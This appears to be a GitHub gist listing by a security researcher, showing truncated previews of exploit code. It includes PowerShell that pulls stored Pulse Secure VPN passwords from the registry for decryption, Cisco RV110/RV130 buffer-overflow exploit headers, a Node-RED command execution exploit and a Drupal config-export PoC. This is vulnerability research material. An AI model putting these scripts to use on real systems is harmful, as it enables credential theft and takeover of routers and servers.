View CVE-2020-8956.ps1
Add-Type -AssemblyName System.Security; | |
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*' | |
foreach($ive in $ives) { | |
$ivename = $ive.PSPath.split('\')[-1].ToUpper() | |
Write-Host "[+] Checking IVE $($ivename)..." | |
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename) | |
# 3 possible value names for password | |
$encrypted = $ive.Password1 | |
if(!$encrypted){ |
View CVE_2019_1663_RV110.py
#!/usr/bin/env python | |
""" | |
Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663). | |
--------------------------------------------------------------- | |
It simply executes a ret2libc, calling system() with whatever's on the stack | |
as argument. Offsets are for QEMU target. | |
First MIPS-based exploit, might delete later. | |
""" | |
import requests |
View CVE_2019_1663_RV130.py
#!/usr/bin/env python | |
""" | |
Exploit for Cisco RV130 stack-based buffer overflow (CVE-2019-1663). | |
This piece of code will get you proper 'return to zero protection', that is | |
an executable stack (thanks, mprotect) and $pc pointing to the beginning of | |
the stack. | |
Enjoy your shells responsibly :) | |
""" |
View mmc_dump.py
#!/usr/bin/env python | |
""" | |
Dump MMC memory from Airmedia AM-100 or similar devices. | |
# Dumping process steps | |
* drop to u-boot shell | |
* sanity check with printenv | |
* load 512 bytes memory chunk from MMC to RAM at known safe address with "mmcread" | |
* display 512 bytes of memory from RAM at known safe address with "md.b" |
View noderedsh.py
#!/usr/bin/env python3 | |
""" | |
---------------------------------------------------------------------------- | |
"THE BEER-WARE LICENSE" (Revision 42): | |
QKaiser wrote this file. As long as you retain this notice you | |
can do whatever you want with this stuff. If we meet some day, and you think | |
this stuff is worth it, you can buy me a beer in return. | |
---------------------------------------------------------------------------- | |
---------------------------------------------------------------------------- | |
Node-RED Remote Command Execution exploit. |
View setup.sh
#!/bin/bash | |
SDK_SHA512="02c6e8abbfa05072fbc139bc6c1d88245338631e7fa2776cbb2097ff1989fc6af595049a1bf7223dc0d39aa2bb1f31394cbadbcec45aa343d133f9f360675f99" | |
SDK_DOWNLOAD_LINK="https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1" | |
SDK_FILENAME="equinox-SDK-Oxygen.2.zip" | |
echo "[+] Downloading SDK ..." | |
wget -q $SDK_DOWNLOAD_LINK -O $SDK_FILENAME | |
echo "[+] Checking checksums ..." | |
echo "$SDK_SHA512 $SDK_FILENAME" | sha512sum -c - |
View SA_CORE_2016_004.sh
#!/bin/bash | |
# | |
# PoC for SA-CORE-2016-004 | |
# Full config export can be downloaded without administrative permissions | |
# | |
# The idea is to grep for sensitive information within the exported | |
# config files. Feel free to add your own findings :) | |
# | |
############################################################################### |